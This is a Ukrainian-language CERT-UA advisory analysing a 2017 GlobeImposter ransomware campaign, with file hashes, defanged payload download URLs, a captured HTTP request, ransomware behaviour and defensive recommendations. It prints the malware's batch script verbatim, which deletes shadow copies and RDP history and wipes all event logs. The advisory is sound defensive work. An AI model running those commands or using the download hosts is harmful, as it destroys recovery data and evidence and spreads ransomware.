Попередній Аналіз ШПЗ GlobeInposter Ransomware

15/09/2017

13.09.2017 CERT-UA повідомлено про спроби розповсюдження  в українському сегменті мережі Інтернет повідомлень із шкідливим програмним забезпечення, яке є  оновленою версією GlobeInposter Ransomware

 

 

Спеціалістами CERT-UA  проаналізовано файл, який надходив в прикріпленні до повідомлення. 

 

[Довіреність_нa_выписку_Рабчук_Иван.7z]

 

md5: 48226ab07826b6873e672767a3fa2b21

 

https://www.virustotal.com/#/file/83b63bc383249993dffe113a41ba900d65edff54e4747b8fa382701ec4bbe8f8/detection

 

Даний заархівований файл  виступав в якості завантажувача та містив в собі обфускований javascript код ДОВІРЕНІСТЬ.js

 

 [ДОВІРЕНІСТЬ.js]

 

md5: 027aa379bac6f35ecf826b0b56da9032 

 

https://www.virustotal.com/#/file/6988634f53d86c798462f90b2e32d7619477c88ae93d2d1cd2443331629c55f2/detection

 

Скрипт, при наявності дозволу на виконання js файлів на комп’ютері, завантажує  svc.exe

svc.exe файл позиціонується як  Trojan.Win32.Filecoder.

md5: 861e0824b4515b0a9afa19da3a0cd908

 

https://www.virustotal.com/#/file/927e2a0e67eb309007d2e1b8d0e7738e6462afe48f289e36d2827c7787f7e2ba/detection

 

 

Файл завантажується з наступних джерел:

 

hxxp://poperediylimitkv.com/hiloddfvnc/svc.exe

hxxp://book-house.org/html/files/image/svc.exe

hxxp://vkmodule.com.ua/images/svc.exe

 

===================

[Received new connection on port: 80.]

[New request on port 80.]

  GET /html/files/image/svc.exe HTTP/1.1

  Accept: */*

  Accept-Encoding: gzip, deflate

  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .N

ET CLR 2.0.50727; .NET4.0C; .NET4.0E)

  Host: book-house.org

  Connection: Keep-Alive

======================

та запускає його виконання за допомогою команди Exec після визначення дати на інфікованому комп’ютері, яка не повинна бути більша за 29.10.2017.

 

Даний тип шифрувальника  розповсюджується через поширення листів, використовуючи соціальну інженерію. Поширення по локальній мережі поки що не зафіксовано.

 

Виявлено, що шифрувальник файлів не функціонує, якщо в системі немає бібліотеки msxml2.dll.

 

Виконання svc.exe  файлу.

Svc.exe  під час виконання самозмінюється в програму  ./svc_modificated.exe MD5:a634a68e7d2e28cf640915474745dc1f  

 

Файл-шифрувальник експлуатує вразливість CVE-2017-0263 для підвищення привилегій.

 

Основною функціональністю svc_modificated.exe є шифрування файлів кореневого каталогу диску С та D. Під час виконання цього файлу опрацьовується наступне:

 

— для вибору файлів для шифрування відкидаються такі директорії:

 

Windows Defender,Internet Explorer,Kaspersky Lab,McAfee,Avira,Avast,Dr.Web,Symantec та

Symantec_Client_Security,spytech software,COMODO,

Windows,.Microsoft.Microsoft Help,Windows App Certification Kit

Windows NT,Windows Kits,Windows Mail,

Windows Media Player,Windows Multimedia Platform,

Windows Phone Kits,Windows Phone Silverlight Kits,

Windows Photo Viewer,Windows Portable Devices,Windows Sidebar

NVIDIA Corporation,Microsoft.NET,

Outlook Express,Movie Maker ,Chrome,Mozilla Firefox ,Opera,YandexBrowser,

ntldr,Internet Explorer

 

— ігноруються файли з розширенням:

 

.$er,.4db,.4dd,.4d,.4mp,.abs,.abx,.accdb,.accdc

.accdb,.accdc,.accde,.accdr,.accdt,.accdw,.accft,.awdb

.clkw,.daconnections,.dacpac,.dadiagrams,.daschema,.db-shm,.db-wa,.dtsx,.fmp12,.fmps,.itdb,.mdbhtm,.rctd,.sqlite,.sqlite3,.sqlitedb,.teacher,.wmdb,.xlgc

 

— використовується запис в регістр для запуску

 

/Software/Microsoft/Windows/CurrentVersion/RunOnce

 

— створюється в кореневому каталозі С файл-попередження про вимагання біткойнів або грошовий еквівалент в гривнях. PAXYHOK.html

 

 

— генеруються RSA Encryption ключ для шифрування файлів з sha224 та sha225

 

 

-щоб унеможливити відновлення зашифрованих файлів виконує скрипт та знищує всі події з лог файлів які містять значення «25a2»

@echo off

vssadmin.exe Delete Shadows /All /Quiet

reg delete «HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default» /va /f

reg delete «HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers» /f

reg add «HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers»

cd %userprofile%\documents\ 

attrib Default.rdp -s -h   

del Default.rdp     

for /F «tokens=*» 25a2 in (‘wevtutil.exe el’) DO wevtutil.exe cl «25a2»

 

-змінює атрибути доступу до файлів з метою шифрувння.

 

— вбиває процеси outlook, postgre, excel

 

 

Перелік індикаторів компрометації:

027aa379bac6f35ecf826b0b56da9032  ДОВІРЕНІСТЬ.js

48226ab07826b6873e672767a3fa2b21  Довіреність_нa_выписку_Рабчук_Иван.7z

861e0824b4515b0a9afa19da3a0cd908 svc.exe

 

Рекомендації CERTUA

  1. Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви, наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
  2. Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштовогой веб-трафіку.
  3. Установити патч який виправляє вразливість CVE-2017-0263

    https://portal.msrc.microsoft.com/en-US/security-guidance

  4. Не працювати під правами адміна.
  5. Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
  6. Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.